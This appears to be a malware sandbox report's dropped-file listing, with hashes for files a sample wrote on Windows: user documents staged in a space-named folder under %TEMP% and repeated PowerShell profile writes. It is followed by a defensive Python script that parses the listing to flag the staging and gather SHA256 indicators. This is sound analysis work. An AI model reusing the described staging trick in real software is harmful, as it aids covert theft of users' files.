| SHA1 | c60da4830ce27afc234b3c3014c583f7f0a5a925 |
| SHA256 | f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081 |
| SHA512 | dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016 |
C:\Users\Admin\AppData\Local\Temp\_MEI6242\zstandard\backend_c.cp310-win_amd64.pyd
| MD5 | ee146c36c6f83a972594c2621e34212d |
| SHA1 | 71f41b8f4b779060fc96de58122e6c184cbe259c |
| SHA256 | 4378881d850bc5796f2d66f7689e7966915b11dfd9130449137fbcb61c296b84 |
| SHA512 | 2964939a0091ffd3b0ec85afab65d6b447af8fc09e39d9f655f1fb0edaaa52b9b5cb8258b4621b787e787b9b1eccc53335ca83090be7d4739d77340dc31e46b1 |
memory/4848-64-0x00007FFC03343000-0x00007FFC03345000-memory.dmp
memory/4848-65-0x00007FFC03340000-0x00007FFC03E01000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yysnds2x.ab5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4848-81-0x0000027FC1970000-0x0000027FC1992000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 62623d22bd9e037191765d5083ce16a3 |
| SHA1 | 4a07da6872672f715a4780513d95ed8ddeefd259 |
| SHA256 | 95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010 |
| SHA512 | 9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
\??\c:\Users\Admin\AppData\Local\Temp\lojle10l\lojle10l.cmdline
| MD5 | f7a4353c31050804aeabbd5396658b8e |
| SHA1 | 79425cc1e9ff0ef6ec801440f32be88665c1ac45 |
| SHA256 | 8b40b068a69ccea92ff5d8204119de2c864141c005e50fabfd6d208e46ab7773 |
| SHA512 | 1892a62b809052afd32879c857ed3a437b0917a86c0b22dd16d95526a738b4f74c1423f3596bc827fb816b4303b7a71c3fdfd00050dee0cb8a0fecdca3e1cd8e |
\??\c:\Users\Admin\AppData\Local\Temp\lojle10l\lojle10l.0.cs
| MD5 | c76055a0388b713a1eabe16130684dc3 |
| SHA1 | ee11e84cf41d8a43340f7102e17660072906c402 |
| SHA256 | 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7 |
| SHA512 | 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2 |
\??\c:\Users\Admin\AppData\Local\Temp\lojle10l\CSCC2FF8CFCF8194165BEA0632CE55CF0DC.TMP
| MD5 | c5846502781f982769ece7d6afe19717 |
| SHA1 | 15bf54fe129de5415c1f2ee245889af40f304041 |
| SHA256 | 15b5c7fc9c9d41aadaa42189a7b6dda8aa309311a4499324068afb1b2401d36b |
| SHA512 | 1baa0760181f4ff663178d38e273d5305a3ea2f417c943d1dab6fd84d1932c0bf2aa6a8463fbb366a18e2bc44c72858102ebb5898c6371f2668fcd0e6c085691 |
C:\Users\Admin\AppData\Local\Temp\RESD32E.tmp
| MD5 | 3279c2d442b128d31910eb49c6c0de41 |
| SHA1 | 38a09922b1aac4940fe75a67d7e8f6352d231877 |
| SHA256 | 59b5827e9de5d9164bf97e012cd73f64666fa63a7149197200b4da2b7bf992c3 |
| SHA512 | 84e97dc80518668f9ab7b0fa418c0843e1d947673959ddb30ef4315c049dc0f629c99cb0913848fd6d3c77f1babc7762246b3bc4f76065b37b2f0eaa8f9e3a9e |
memory/4604-184-0x00000165BD6B0000-0x00000165BD6B8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\lojle10l\lojle10l.dll
| MD5 | 0fbc8826e8d19a65891225b8ae2c94ac |
| SHA1 | 55f0a950b4bc03005fcb40fea30c71939ca99582 |
| SHA256 | f46420f991b594ecd9b0e00f1d47855c00c229b7fa2a6a8a0a4ffeea69387e8a |
| SHA512 | 45fd6eae4f68843f9461bc29085429ec85f9896c6a09d6bcc3bc7deb55bcf0981369967e8f33ccaf5cbdbb23e37cdd8cab476f965ca0890cbb649019f54ba618 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
memory/4848-188-0x00007FFC03340000-0x00007FFC03E01000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7501b957609b244cbd89b29c26443ffb |
| SHA1 | 554b181404b94a7baefbd0219195bd67d17f4794 |
| SHA256 | a7178081fdfd14852f143505399efb91273be5d86b35916a9fc13f53b5a6c3f8 |
| SHA512 | 31ffc7c3feb5b3203da326ab667db3080fadb0d06a8328365d49654a0d1f7061b583fd328a59cda4ea97c6be2fbea2da3a0cca97ec0bbdd6d105ed2e3136c8d0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a291ad5daa71a8fb81c94551b1552963 |
| SHA1 | 85a37f5e0e28536df3c9a5b84ed2b4b46de0a34d |
| SHA256 | 2cb80d42b78ddaeb182dc6c8dfebb0968908173bbfc8261f172ab60a1278e192 |
| SHA512 | c2faac85da8bc488d6642b7484107e167f378ca7890a7d40134f4df583a97c3b4e53bd5c133a77a2d1f3bc36a4f55ef87378993da12e424c150ccba3586ffcfe |
C:\Users\Admin\AppData\Local\Temp\ \Display (1).png
| MD5 | 152b41cb3a9691e11fa43fd0405ede91 |
| SHA1 | bd958f14daf02ea8eb018e9d96ba13911983c974 |
| SHA256 | 380efdf5d38774286679b118784af60b9247b09548e6a382d555bd76aeaed599 |
| SHA512 | 7bb55134d073f78379c5502b51e3deb8220b1f6013b49e254bd7eafa43c5f57b763940893a59f5a406dcc0da07d41926a5de1ca002d064792c5414b8cd22c582 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\ImportBackup.mpeg
| MD5 | c013624491d2db6ce0c9ebffdf0ac6f8 |
| SHA1 | 5c7819ccf9bd4c3f280b53a3decda034db8b2308 |
| SHA256 | e402e1317cfd28757caedb6e2cb9892723f766e253cc711f7d123d81fcc5ca74 |
| SHA512 | 8b277e13d258ad1448f3819e5376f245f70075d6d3932108e9b0b593e9306560766746cf24cad6fc950257d073f4cd32a2ecbae90da17fe83e31f78509ce79ef |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\ConfirmBackup.xml
| MD5 | adb99744ad67e99331673db15e27d4d3 |
| SHA1 | 10b66f28e7eeda0c786154eda9e1c7cc47b4d76d |
| SHA256 | e37e7dea4b20169b4fbb8ed66814824ab8905b242a0d4292527f320a511b4c38 |
| SHA512 | d2d97aa101a678d6439dfd53017d6ea7fd21b024124fde451cebc792a9b430bd2422740174cdc2ca643423aa2b4d57acc286f703bad30605982576b9e95e91f7 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\AddReceive.xlsx
| MD5 | 586f68efe9e5f4747fc82a90bcd92f2d |
| SHA1 | 716b7a72146fd28fed9c362e27b3afdaef6af4de |
| SHA256 | 2801bae9f696170480462730f3e0c7342cd0a1da99e3df85455eba794dac1dd7 |
| SHA512 | 37c0d2582317fbccc6a29912adfe3627be1a5c467f1e21c2ed8a87123234f962bffca5a908286e3fc1f1f1b7f35db29447b74fb1558257e6871e397d76dce0ea |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\EditAdd.docx
| MD5 | a8ebf0851211865d08199ab06c80d4bf |
| SHA1 | 66e0f343c559c589020c7c2a05abcd6a78f648f8 |
| SHA256 | d73f205c75d8b65034ca0e49516a520dd839da2c0368202b33dadb54d2693fce |
| SHA512 | 8e3459767f9972e55b463d39f4add0f18697e0134fafda40ae22aacae5d16ffdc14a4fcdb69e6f076bbc121b5e2155cdce0bf43130c67d0546e7044c66e6b14d |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\WatchStop.docx
| MD5 | f73267488a81f01511c81a233139ccbc |
| SHA1 | eddd019e5b2c796ae7f48472d5e6a505336a1cfa |
| SHA256 | 4fa687b679dfb487c2ca48480fcd9755f378177e2081c5d5fc2793f75ffa0e02 |
| SHA512 | 62c6eb34f11d1bd3a33a295ab49d0b37f1d154693cb463ed8dcb03bfe7ed869e3b71f932c7441fc5f37d0ca7524b384bd73fb61c7fd132acf2e37373b0df1d37 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\WatchFind.doc
| MD5 | a7babd4f107850015947dea593ca85cd |
| SHA1 | f263814e004a82a9709b0d387c5c660d5772f3fa |
| SHA256 | f7fb8007da9820e79b059765b9db7a5cbf6a908de25ff7d0503711fca0ad13ef |
| SHA512 | afd4cfce872934beff2473981167a5a8d788c08d612b6315ee45c8c90c264d1443e4da0c2e97aefa39392365eae984b3c2929feaff15cc3a47da75372878b4fc |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\UnprotectNew.xlsx
| MD5 | 25b1aba004a81909385ad901db21420f |
| SHA1 | bfeea10e69c0b99bca072a9995b98a3f45b155d9 |
| SHA256 | fc73e7df3d777c617cb5820f2793b0bfd36d9d3d020a62a692526ec3207e01b1 |
| SHA512 | 299ebed6b8fb486a6fcb9d0c654a862d4f0880a47c22bccd36dfb80ddd7464b987f5d5769389f6e0b2cb5717bce4a79af8e3e5b130ca0ea1820e0273ddc11847 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\UndoApprove.jpeg
| MD5 | d4a5b1f95db44d23706e0f00108124a5 |
| SHA1 | 41f5a34515aa5ce292300ab8096d8fbf430a4ecd |
| SHA256 | ab422f49e5ea85edda7dc90d18c04bbc32db659aa67cbc87eef4a170b1a6a79c |
| SHA512 | 4d488d3078c25c149dfad955fd3c218334068f0ad5049e78e596bb9819a52c6b9b045394cd4a702bac65744872819f4959a03ff5832b76311cadc3197952486e |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\EnterOut.xlsx
| MD5 | 11d3d5f9c1254f0f88b8a7f9d3934862 |
| SHA1 | db0edf3f7ec5a1cd98e7c8189627254168d45349 |
| SHA256 | 31605db1e330ac1d47f03d4dc4f88d10a9dcd5ab99ad9bcf4e8b05c5046c525f |
| SHA512 | cdfeaf10e1949fed0d5101d82a5473b7108985a0edfa2ffc99c9483ca360e747caeb189695eb6c2239ddd7e8d286dc4378fbf49a0093a3fff8b857f9fa28ae37 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\RequestApprove.doc
| MD5 | 69d424971684d441e0aefe4d53630a09 |
| SHA1 | 5f0a2480b84b9b3d5ca92d69b33dd693d5a66a41 |
| SHA256 | 0fac1fcdf1d79c95850823d465056c14d17b4290b762239140594f2b487eeb13 |
| SHA512 | 60588ae31e9fa54296fbe1b6f15f4a68146b182655b3f601b3bc23f6645ab3633bd300889fb97c1dd80b41671027cc04365558c9d3eadd1fc4586a95cd4518d0 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\PingResize.docx
| MD5 | eb2d8811722e9b426b7ee9caba121fbe |
| SHA1 | 688ef18cfb6fb15ea85e1968d696873423ba4860 |
| SHA256 | 4201942c34e2094e4ef0f9dc4fc4b0d96b0e44d109494e2876c6523a4f79d606 |
| SHA512 | 3448ff4175b9abd7e9d224bcf47557658d6f68094fc2d22bd6ac73b09e88f47c33b4324c0b35252f5c41d568d6473d4ca5f1d66fd24274db090852c7c9001882 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\HideSubmit.doc
| MD5 | acddf7c223d84bf40199608fec3bc7ff |
| SHA1 | 514dcae3a17d453ae0df4d1f79d1c40582ab1842 |
| SHA256 | 7872d604e773b356fa06722e9348e6df8b807e1ee90135d15e55eb12b0fe54fe |
| SHA512 | 0cee61c8948d5a625973dc5e6e37a5b3481d2e456e5aceee67bf8ca4fb3a3734c29f3c529bd50650508dfae627c965f9e2cbb72209ad3d72f0c55c0e9601c76e |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\RestoreConvertTo.csv
| MD5 | e376b5cff1f1c3bb7493463ca33751a8 |
| SHA1 | 921494f0e94d1720051b12bd64a0a29909d2a5a8 |
| SHA256 | a7d43a40312c2b6a3e264b0d1b801f957eef27267dbac085105ecd47c720790e |
| SHA512 | 74fba65563c5a61f42523b30e6304ce363e3c92ed3c2e4356258391f3a49d9e67d13b932a6b40730600ea367faed38f103eb7c863405c034131f9ae5f8cfb25f |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\StepConvertFrom.txt
| MD5 | fc5b67cc089ce8b197be91901031c8be |
| SHA1 | 07a80cc118ba0c5e535148b15fbbebf8a8cb2adc |
| SHA256 | 62d7f2248b1f7acd22e54a0fa54dc96ad297f5def43a291fa86378afa29a3a94 |
| SHA512 | d34bc65e45066d437141db09df774df4a34a58f8ad3b6d2a15f7c34b48a0098fb31ae25898c37d927a77817c965129e72f982305d8f35a35a7cd08cfde88fbbb |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\UndoMove.xlsx
| MD5 | 5f62f52ffcefff59dc26de22ea5f2556 |
| SHA1 | 2a542009c51ab24cac5f77f55f2779b8d5bddf7b |
| SHA256 | 4d783085d40501e44d83821a75ee07b8e056d23795ccae4fdb415e700cf83e7f |
| SHA512 | 5a4fdf55ebba9caaa055fa1f8a5515736f505d356a8ea4507e19848b18a6ffc4e10ee812a03dc39c642c44569e18485c5b97817dc508509e177b4e5c765c4093 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\EditBackup.mhtml
| MD5 | 37819c57bfbfae91512bf3e2d617f2bc |
| SHA1 | ef8865f52f9558577cebba0078fe67d43e25eca0 |
| SHA256 | c95386ad185f950bef718154dfa830a2d529438d0baaf885f8ce13e8029ad846 |
| SHA512 | 4b1bb8bb811ebc1f88f5bcde7fb0fae7e78fcb4251a1c96326f99b188d97eaade105e0d549e6242d31212981e4781f8d074c8b269edc05aebe5ebe51bbd1ebbc |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\CompressNew.jpeg
| MD5 | c6311d47c8b9c1d2007fc79a2890dd50 |
| SHA1 | 54cfd151c4ea996aaf5294be37b8e8dc9b975fa9 |
| SHA256 | 3aea45617a498c9db559b5466d2faae20ec9bec32d9dbd990201f6f1aa3bbfc2 |
| SHA512 | 0cad17efddadf3e3018e5c8aee769e1e1fa0c88177668306ab3e87ee26a809885831e26f2ec73cbb3623a3a87ea9f3944ddf16bd7af82b3a0ca3257fdacdaffd |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\MeasureEnter.pdf
| MD5 | 426d47bace249de2d47547d0a88e90b2 |
| SHA1 | 631cc3edad521baea601756b7e523d91488ee64e |
| SHA256 | 8f6c70a6a20d4faaa995a0e66032a4e6d5f7dd1090fd453586960d5c74f8abe9 |
| SHA512 | f7ea6d3fa6bf17cf8b1be92e369cd43704bfe49d52b381a94a1077f2cd0c7bef73555162722c50549b2ebf8f71ab9a65f5842615cf91b1e01253e43852ade37f |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\LimitAssert.mp3
| MD5 | 8a3e8c21bbf15688062ea3b22a68e277 |
| SHA1 | 7209f274731433861877d182c9e8f292b588bee9 |
| SHA256 | f2296cf41402fc31cec072c212d2203d0835e4dba28c914cfeaeaaa3c4732b47 |
| SHA512 | 923e6c8cac3913bb238c0a412c4432b1b17495d764ad783c317fca24753153051feb6ba31ccf25a3034a84450bfa408ef238a4fcbdf3b1c8425a9c2627777830 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Music\BackupEnter.mp3
| MD5 | b6573e891c4bd03bbc102196f5e83a93 |
| SHA1 | 388a2efe2b1b75306e153e2b6bcaa9fdd4c32d89 |
| SHA256 | b9bd9febd6ffab051e22c38ce46b6a16cd01c7568bb0a27a0be623c76af85bf6 |
| SHA512 | 301a41166e2f3fa304afd081b8578a2dbb1af497f6bfaf51ed3058d20f58da5670dbd26c18894005e0bb3fd5286fc4a6c2d1b04f93f78b422420688cb173c4f9 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\ResumeSet.txt
| MD5 | 425e2ea5d1a6777f0956c65249a0e0ef |
| SHA1 | 6fae09f2a6d1664c5afc4f9029e82a1ef0e720b5 |
| SHA256 | a042a6ced514da967c26744d88f781aafab4f261e0d68ea7279daf300b053d84 |
| SHA512 | 3c30c30146e3a050c9cb5605c78995aa3fa4f7339954e57533ac234ce56b9acaade0391ecdafd6b65ad9f45e1d738783c6d36e84e22c95adc480d963f5deffdb |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Music\UnblockEnter.xls
| MD5 | ba7367179067969fa5ca3f6f4d308161 |
| SHA1 | 94c0085540f843fd55a315b9f0c560ce02db1843 |
| SHA256 | a03196c51e622a7a50d3cd9cd8db44df83def73fd6d171ce4d8c7749187e44f8 |
| SHA512 | e60b87e9c83c4cf47eafc0edf183f0eb6c8dcdfefa12cf94cdddefc41b71644aab47a2bfd12cdd9324cd905930954c9832b86c91594a80786db4b3cb6816fea5 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\BackupEnter.tiff
| MD5 | 33b4cb888e6e7202fe7a7da2599930d1 |
| SHA1 | 442ed9351b6fe766c0742c72d95b1473b29bc59c |
| SHA256 | 852159986cfd56ad7819a6d219c695c2039bc1b770d8babf23d8aae5807dd1cf |
| SHA512 | 718f811aae916cd74787da8e5c3c27fb418011fc7b00ba5622f4eefe1e821763fe24e6e6793d8c8ff299a8803d6a8e5038bcbd23be0b4242435f568dd490410f |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\PopDisconnect.jpg
| MD5 | 997f2e2ef1bec152967b952e3d735341 |
| SHA1 | 5ff9fc5e673c2cf60404e9187e829a525bc4e2f4 |
| SHA256 | 459b3983c490a7081ff8d6b6bc5c74200694c78472ce3e321e123b36325130f2 |
| SHA512 | f44790c3ddbeb920ba01b0adf22feef42ed47b821554828f87ff45ac6182f684a23548e4d65a3eca71bdf32d3194dc925000556179b54b3a6e6426293c60c817 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\PopApprove.png
| MD5 | 0aa21d16271e4f18cff8d4d8467e6fc2 |
| SHA1 | eefce4e14ecfcb76cea3c3ded5534edcca87551c |
| SHA256 | 77a3bb86b48decbc54936fa692756b186c91e58a5747a540b447c9e36197d1c1 |
| SHA512 | aab45cde59497d00c19a492f285db7e4a9d5b02aa646a3a57c97d25c1767f9aa60fba9efa90ff3a693177321ea3e709c7a9462bdf8eb89511c8128337c3703f0 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\My Wallpaper.jpg
| MD5 | a51464e41d75b2aa2b00ca31ea2ce7eb |
| SHA1 | 5b94362ac6a23c5aba706e8bfd11a5d8bab6097d |
| SHA256 | 16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f |
| SHA512 | b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\DismountPush.jpg
| MD5 | dc2edc286fec8a26cd949e159d5e7b73 |
| SHA1 | 63634f5b3e0fa8e5252628c38adf21f8a6c5fc58 |
| SHA256 | b3c4e2ceb2a3b6262c2200134f87408b7656881c62efd606c337d4441455231f |
| SHA512 | 42c63ed9b3bf1685506a79df86efcac84f450acc5afb7ffc2e0b4970fe9af4c14aa096623ad6bc38b526c33369898738bb31f853f2ac45f02ebfea86cb92aa08 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\UpdateInstall.jpg
| MD5 | e838c765229925ca58d94b64cbed72a2 |
| SHA1 | c4624aef17dff6e2ef56a1297be159c0a2d38b49 |
| SHA256 | ee22fbadf7f81439fd949ea255b9b1a7db85b3042b566d7c929baa40114dded8 |
| SHA512 | 6a444415a2e9693cdcab6f14db57a8ae72b059bbf3f72a5fb40da03c290b8da42351eae04ef9573809789f8ac34d0607c053bafbc8b473d30634f2d271f130de |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\WriteRedo.jpg
| MD5 | 854dae9190175ec69c5dd1338d4ad855 |
| SHA1 | a5e1a82a1860f72da9ec59a0a662c3bc30fc230a |
| SHA256 | c4b602f27affde5f024c94255fbed61baadc47fba10299436cc44a8a2e1409fb |
| SHA512 | d18bd7b8bcb0154bf7f271ef36bf90e693a11ff562fe5e80f5282f1339bd23350f210c111af3c199b780d007b126761403c8192a37ac10bd3de8361f40b26acd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6317adf4fbc43ea2fd68861fafd57155 |
| SHA1 | 6b87c718893c83c6eed2767e8d9cbc6443e31913 |
| SHA256 | c1ead17eef37b4b461cedc276504a441489e819c7f943037f2001966aeec90af |
| SHA512 | 17229aae8622e4bfc3caaac55684f7d4ccd3162af5919c851b1d8ac4060b6bb7b75044ecee116523d05acb55197dcb60780958f629450edef386f1e6f65f49f0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d04a2991e3807ca4a4073c023b2d20b3 |
| SHA1 | 86aeb69fd3f1c1515feb18ed345191124735775f |
| SHA256 | 33cf5b77be962c1121404da98638346eaa2286b64e45ae71e3cb5e95671b000d |
| SHA512 | 90be20a64f603d7124a84e807d1dc5d6e36bc67caf6b9b282b2c918d1beb5b9f16abb4788dcc5a2df06ad1a6606c8929962962c3db51586cd00c976b7f79b8c5 |
memory/824-394-0x0000000061CC0000-0x0000000061D69000-memory.dmp
memory/824-435-0x0000000061CC0000-0x0000000061D69000-memory.dmp
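The dropped-file listing above carries a signal that is easy to miss when reading hash tables one at a time: ordinary user files (Desktop, Documents, Downloads, Music, Pictures content) are being copied into a directory under `%TEMP%` whose name is a single space, and the PowerShell startup-profile cache is rewritten several times with different contents. The following is an added triage script, not part of the sandbox report, that parses this listing format and pulls those two facts out. The `SAMPLE` text is a constructed excerpt of the entries on this page; the "whitespace-only directory component" rule and the reading of the staging folder as local data staging (ATT&CK T1074.001) are this example's own interpretation, not something the sandbox asserts.

```python
"""Parse a sandbox dropped-files listing and surface collection/staging artifacts.

Added example, not the report's own tooling. SAMPLE below is a constructed
excerpt of the listing on this page; the whitespace-directory heuristic is an
assumption of this script, not a rule the sandbox applies.
"""
import re
from collections import defaultdict

SAMPLE = r"""
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a291ad5daa71a8fb81c94551b1552963 |
| SHA1 | 85a37f5e0e28536df3c9a5b84ed2b4b46de0a34d |
| SHA256 | 2cb80d42b78ddaeb182dc6c8dfebb0968908173bbfc8261f172ab60a1278e192 |
C:\Users\Admin\AppData\Local\Temp\ \Display (1).png
| MD5 | 152b41cb3a9691e11fa43fd0405ede91 |
| SHA256 | 380efdf5d38774286679b118784af60b9247b09548e6a382d555bd76aeaed599 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\ImportBackup.mpeg
| SHA256 | e402e1317cfd28757caedb6e2cb9892723f766e253cc711f7d123d81fcc5ca74 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\EditAdd.docx
| SHA256 | d73f205c75d8b65034ca0e49516a520dd839da2c0368202b33dadb54d2693fce |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\My Wallpaper.jpg
| SHA256 | 16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| SHA256 | c1ead17eef37b4b461cedc276504a441489e819c7f943037f2001966aeec90af |
memory/824-394-0x0000000061CC0000-0x0000000061D69000-memory.dmp
"""

# "| ALGO | hexdigest |" rows that follow each path line in the listing.
HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
# A path component consisting only of whitespace, e.g. "...\Temp\ \Common Files\...".
WHITESPACE_DIR = re.compile(r"\\(\s+)\\(.*)$")


def parse_dropped_files(text):
    """Return [{'path': str, 'hashes': {algo: hex}}, ...] in listing order.

    Any non-table line starts a new entry; hash rows attach to the most recent
    one. Entries with no hash rows (memory dumps) are kept as well.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_ROW.match(line)
        if m:
            if not entries:
                raise ValueError("hash row before any path: " + line)
            entries[-1]["hashes"][m.group(1)] = m.group(2).lower()
        else:
            entries.append({"path": line, "hashes": {}})
    return entries


def staged_files(entries):
    """Files written beneath a directory whose name is only whitespace.

    Returns {subfolder: [filename, ...]}, with "" for files dropped directly in
    that directory. User documents landing under such a folder in %TEMP% is the
    local data-staging pattern a stealer uses before exfiltration (assumed
    interpretation; the sandbox does not label it).
    """
    groups = defaultdict(list)
    for e in entries:
        m = WHITESPACE_DIR.search(e["path"])
        if not m:
            continue
        folder, _, name = m.group(2).rpartition("\\")
        groups[folder].append(name)
    return dict(groups)


def rewritten_paths(entries):
    """Paths listed more than once with differing SHA256 values.

    The PowerShell startup-profile cache being rewritten with new contents is
    consistent with several separate PowerShell invocations during the run.
    """
    seen = defaultdict(set)
    for e in entries:
        if "SHA256" in e["hashes"]:
            seen[e["path"]].add(e["hashes"]["SHA256"])
    return {p: len(h) for p, h in seen.items() if len(h) > 1}


def sha256_iocs(entries):
    """Sorted, de-duplicated SHA256 values for blocklists or retro-hunting."""
    return sorted({e["hashes"]["SHA256"] for e in entries if "SHA256" in e["hashes"]})


def summarize(text):
    entries = parse_dropped_files(text)
    return {
        "entries": len(entries),
        "staged": staged_files(entries),
        "rewritten": rewritten_paths(entries),
        "sha256": sha256_iocs(entries),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(SAMPLE), indent=2))
```

Run against the full listing, `staged_files` groups the copied documents by their original profile folder (Desktop, Documents, Downloads, Music, Pictures), which is the shape to expect from a collection routine walking the user's profile; `rewritten_paths` flags `StartupProfileData-NonInteractive`, which ties the dropped-file view back to the "Command and Scripting Interpreter: PowerShell" signature in the summary. Note the parser keys on the whitespace-named component, not on a fixed path, so a variant that stages under a different parent directory is still caught as long as it keeps that naming trick.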